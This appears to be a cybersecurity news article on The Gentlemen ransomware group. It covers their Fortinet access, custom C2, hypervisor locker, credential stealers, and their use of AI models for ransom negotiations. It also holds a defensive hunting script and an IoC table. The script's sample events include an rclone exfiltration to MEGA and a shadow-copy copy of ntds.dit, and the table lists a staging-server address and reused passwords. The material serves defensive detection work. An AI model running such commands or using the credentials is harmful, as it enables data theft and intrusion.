The Gentlemen Ransomware Group Uses Fortinet Exploits, AI, and Custom C2 Frameworks

Jun 04, 2026 · 5 min read

A Russian-speaking ransomware crew known as The Gentlemen has quickly risen to become one of the most active threats in 2026, ranking second only to Qilin in ransomware activity.

Their toolkit combines Fortinet vulnerability exploitation, AI-assisted operations, and a fully custom command-and-control framework that most security tools simply do not see coming.

The group operates without a central office or traditional payroll structure. Nine operator handles have been identified communicating across time zones through a self-hosted Rocket.Chat instance on an onion site, with plans to migrate to a Rust-based platform.

Their lean, distributed model marks a clear shift from the rigid corporate setup that groups like Conti once maintained.

In May 2026, the Ransom-ISAC research team extracted 3,366 messages from The Gentlemen’s Rocket.Chat server, exposing internal plans, tooling discussions, and victim targeting details.

Analysts at Vectra AI noted the findings in a report shared with Cyber Security News (CSN), observing that while the group’s tools have changed considerably, the core weaknesses they exploit in victim networks have stayed nearly the same since 2022.

The leaked messages also uncovered a connection between The Gentlemen and earlier ransomware brands. A negotiator known by the handle “Tinker” appeared in both Black Basta chats and The Gentlemen’s logs, performing the same operational role across both groups.

A shared Matrix homeserver, bestflowers247.online, was present in archives from both groups, anchoring that infrastructure link with hard evidence.

This pattern points to a larger truth: ransomware operators do not retire, they rebrand. The same people carry their knowledge and access from one criminal enterprise to the next, making group takedowns far less effective than many defenders might hope.

Gentlemen Ransomware Uses Fortinet Exploits, AI, and Custom C2 Frameworks

Fortinet remains the front door of choice for The Gentlemen. The Rocket.Chat logs mention FortiGate 81 times, with CVE-2024-55591, a FortiOS authentication bypass flaw, called out explicitly as their primary way into victim networks.

Halcyon’s separate analysis found the group brute-forcing roughly 1,000 Fortinet VPNs, in some cases using reused passwords like gentlemen25 and gentle26 across multiple victims.

Once inside, the group deploys a custom C2 framework called G-BOT. This previously undocumented control panel supports per-beacon SOCKS5 tunneling and uploads builders to temporary file-sharing sites, replacing commercial tools like Cobalt Strike.

That switch makes detection harder for security teams relying on known signatures.

The group also targets hypervisors directly. Their Linux locker attacks Hyper-V Volume Manager, encrypting at the hypervisor level so that endpoint agents inside virtual machines cannot see the attack.

The locker drops the extension .i8p14s and leaves a ransom note named README-GENTLEMEN.txt, signaling that no layer of infrastructure is off limits.

AI and Credential Theft Complete the Kill Chain

The Gentlemen have moved AI from a novelty into a working part of their operation. Operators reference using GPT and Claude models to assist with ransom negotiations, with one operator describing them as automatic response writers for victim communications.

The group also discusses renting GPUs on vast.ai and running uncensored AI models from Hugging Face to triage large volumes of stolen data.

For credential theft, the group relies on Phemedrone Stealer V2.3.2, LummaC2, XenAllPasswordPro, Chrome App-Bound Encryption Decryption, and DumpBrowserSecrets.

These tools pull saved passwords directly out of browsers without triggering login failures, meaning standard authentication logs show nothing unusual. Stolen data then moves out through rclone to MEGA, following the same exfiltration pattern ransomware groups have used for years.

Defenders have clear steps based on what the leaked chats reveal. Security teams should audit edge devices including Palo Alto, Fortinet, Citrix, F5, and Cisco gear against the CVE list discussed in operator chats.

Treating NTDS.dit and VSS backup access as an immediate severity-one alert, rather than a forensic discovery made weeks later, can stop domain-wide compromises before they fully develop.

Hunting for tools like rclone, MEGAcmd, WinSCP, and Velociraptor on hosts that have no reason to run them adds an early warning layer that logs alone cannot provide.
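The three defender steps above (audit edge devices, alert on NTDS.dit/VSS access, hunt for exfiltration and repurposed DFIR tools on hosts that should not run them) can be turned into a small hunt over process-creation telemetry. The following is an added example written for this article, not code from the report or from Vectra, Halcyon or Ransom-ISAC; the host names, the per-tool allowlist and the sample events are constructed.

```python
import re
from typing import Dict, List, Set, Tuple

# Tools the article names as exfiltration or repurposed-C2 utilities worth hunting for.
WATCHED_TOOLS = {"rclone", "megacmd", "winscp", "velociraptor"}

# Hypothetical allowlist: hosts with a legitimate reason to run each tool (assumption, not from the article).
ALLOWED_HOSTS: Dict[str, Set[str]] = {
    "rclone": {"bk-srv01"},          # backup server syncs to cloud storage
    "velociraptor": {"dfir-srv01"},  # the DFIR team's own collector
}

# Any command line touching the AD database or a VSS shadow copy is treated as severity one,
# following the article's advice to alert immediately rather than find it weeks later.
SEV1_PATTERN = re.compile(r"ntds\.dit|HarddiskVolumeShadowCopy|vssadmin", re.IGNORECASE)

Event = Tuple[str, str, str, str]  # (host, user, image name, command line)

def hunt(events: List[Event]) -> List[Dict[str, str]]:
    """Return one alert dict (host, user, severity, reason) per suspicious event."""
    alerts = []
    for host, user, image, cmdline in events:
        tool = image.lower().rsplit(".", 1)[0]   # "rclone.exe" -> "rclone"
        if tool in WATCHED_TOOLS and host not in ALLOWED_HOSTS.get(tool, set()):
            alerts.append({"host": host, "user": user, "severity": "high",
                           "reason": f"{tool} executed on a host with no business need for it"})
        if SEV1_PATTERN.search(cmdline):
            alerts.append({"host": host, "user": user, "severity": "sev1",
                           "reason": "NTDS.dit / VSS access: " + cmdline})
    return alerts

# Constructed sample events, invented for this example (not from the leaked chats).
SAMPLE_EVENTS: List[Event] = [
    ("bk-srv01", "svc_backup", "rclone.exe", "rclone sync D:\\backups gdrive:archive"),
    ("ws-fin-22", "j.doe", "rclone.exe", "rclone copy C:\\Finance mega:drop"),
    ("dfir-srv01", "ir.analyst", "velociraptor.exe", "velociraptor --config client.yaml client"),
    ("ws-hr-07", "t.smith", "velociraptor.exe", "velociraptor --config c.yaml client"),
    ("dc01", "j.doe", "cmd.exe",
     "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit C:\\temp\\n.dit"),
    ("ws-eng-03", "a.lee", "winscp.exe", "winscp.exe sftp://ops@files.internal"),
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["host"], alert["user"], "-", alert["reason"])
```

Running it flags the rclone copy to MEGA from a finance workstation, Velociraptor on an HR host, the shadow-copy read of ntds.dit on the domain controller, and WinSCP on an engineering host, while the backup server's rclone job and the DFIR team's own collector stay quiet.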

Indicators of Compromise (IoCs):

Type | Indicator | Description
CVE | CVE-2024-55591 | FortiOS authentication bypass; primary initial access vector used by The Gentlemen
CVE | CVE-2024-3400 | Palo Alto Networks PAN-OS zero-day; most-discussed CVE in Black Basta operator chats
CVE | CVE-2025-32433 | Erlang/OTP SSH RCE; present in The Gentlemen toolkit
CVE | CVE-2025-33073 | NTLM relay vulnerability; present in The Gentlemen toolkit
CVE | CVE-2023-4966 | Citrix NetScaler; referenced in operator CVE discussions
CVE | CVE-2020-5135 | SonicWall stack buffer overflow (CVSS 9.4); used by Conti operators
Domain | bestflowers247[.]online | Shared Matrix homeserver linking Black Basta and The Gentlemen operators
IP / SSH | 193[.]228[.]128[.]2:2222 | NAS staging server used in The Gentlemen rclone exfiltration pipeline
Credential | userd0wnloAd1 | Username for NAS staging server used during data exfiltration
Password | gentlemen25 / Gentlemen25 / gentle26 | Reused VPN passwords found across multiple Fortinet-targeted victims
File Extension | .i8p14s | File extension appended by The Gentlemen Linux/NAS locker
File Name | README-GENTLEMEN.txt | Ransom note dropped by The Gentlemen Linux locker
Tool | Phemedrone Stealer V2.3.2 | Credential stealer used by The Gentlemen for browser password harvesting
Tool | LummaC2 | Credential stealer / payload dropper used by both Black Basta and The Gentlemen
Tool | XenAllPasswordPro | Password recovery tool used for credential theft
Tool | DumpBrowserSecrets | Browser credential dumping tool used by The Gentlemen
Tool | Chrome App-Bound Encryption Decryption | Tool for bypassing Chrome credential protection
Tool | G-BOT | Custom C2 framework with SOCKS5 tunneling used by The Gentlemen
Tool | rclone | Data exfiltration tool used to stage stolen data to MEGA
Tool | Velociraptor | Legitimate DFIR tool repurposed by The Gentlemen as C2
File | qwertyuio.txt | File used by LummaC2 to store exfiltrated credentials (observed in Black Basta)
File | README-GENTLEMEN.txt | Ransom note filename dropped by the group's Linux locker
Path | /opt/updateamd | Linux locker binary invocation path used by The Gentlemen
Archive | JA456 | Follow-on leak package exposing Gentlemen operator-side artifacts including NAS and MEGA session data
Platform | temp[.]sh / 0x0[.]st | Temporary file-sharing sites used to upload G-BOT builder payloads

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Source: CybersecurityNews.com
